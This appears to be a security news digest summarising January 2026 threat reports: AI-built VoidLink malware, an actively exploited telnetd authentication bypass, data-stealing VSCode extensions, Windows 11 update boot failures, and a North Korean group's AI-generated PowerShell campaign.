AI‑built VoidLink malware emerges with advanced loaders, rootkits and modular attack capabilities
Researchers disclosed a new cloud-focused malware framework dubbed “VoidLink,” which appears to have been developed predominantly with AI assistance, reaching functional maturity in weeks rather than months — an unprecedented development pace in malware engineering.
The framework includes custom loaders, implant modules, rootkit techniques for stealthy persistence, and a suite of plugins to expand malicious capabilities across Linux-based environments, showing robust modular evolution.
Clear evidence of AI involvement — including leaked design documents and source artifacts — highlights an emerging class of adversary tooling accelerated by automation, increasing both speed and sophistication of attacks.
Active attacks leverage telnetd authentication bypass flaw (CVE‑2026‑24061) to obtain instant root access
Security researchers reported that attackers are actively exploiting a critical authentication bypass in the GNU InetUtils telnetd service (CVE-2026-24061), allowing remote malicious actors to skip authentication and gain root access on affected systems.
The underlying flaw stems from unsanitized environment variable handling, which lets attackers manipulate telnetd into granting root privileges; real-world exploit activity targeting exposed TCP port 23 services has been observed in threat telemetry.
Although telnet is legacy, many industrial, embedded and operational systems still expose the service due to compatibility requirements, meaning easily exploitable services persist in enterprise and industrial deployments.
Two popular VSCode extensions found stealing source code and metadata from 1.5 million+ users
Two malicious extensions in the Visual Studio Code Marketplace, installed more than 1.5 million times, were found exfiltrating developer data to remote servers without user consent, representing a software supply-chain compromise in widely adopted development tooling.
These extensions posed as AI coding assistants but silently integrated data-stealing modules that collected source code and environment metadata before sending it to China-based infrastructure — a critical risk to IP and credentials.
The incident underscores how attackers target trusted ecosystems to evade detection and achieve broad, undetected access across diversified development environments, leading to potential espionage and leak scenarios.
Update‑linked boot failures hit Windows 11 24H2 and 25H2 devices, prompting Microsoft review
Microsoft confirmed widespread reports that a subset of Windows 11 devices fail to boot with “UNMOUNTABLE_BOOT_VOLUME” errors after applying the January 2026 security updates, prompting internal investigation as organizations roll out patches.
The issue affects both Windows 11 version 25H2 and 24H2 builds following installation of the cumulative security update, complicating enterprise patch deployment and rollback planning.
While security updates are critical for reducing exposure to active vulnerabilities, this incident highlights the operational risk of update-induced outages, particularly for large and distributed end-user fleets.
North Korea’s Konni group deploys AI‑generated PowerShell malware in targeted blockchain attacks
North Korean hacker group Konni (Opal Sleet, TA406) launched a targeted campaign using AI-generated PowerShell malware to compromise blockchain developers and engineers across Asia-Pacific through phishing links hosted on Discord.
The attack chain leveraged a crafted ZIP and LNK shortcut, which triggered a staged download of an encrypted PowerShell backdoor and scheduled task persistence, highlighting advanced obfuscation and AI-assisted tooling.
Targeting development environments and infrastructure credentials poses both data theft and potential supply-chain risks as compromised developer systems can be leveraged to infiltrate broader organizational environments.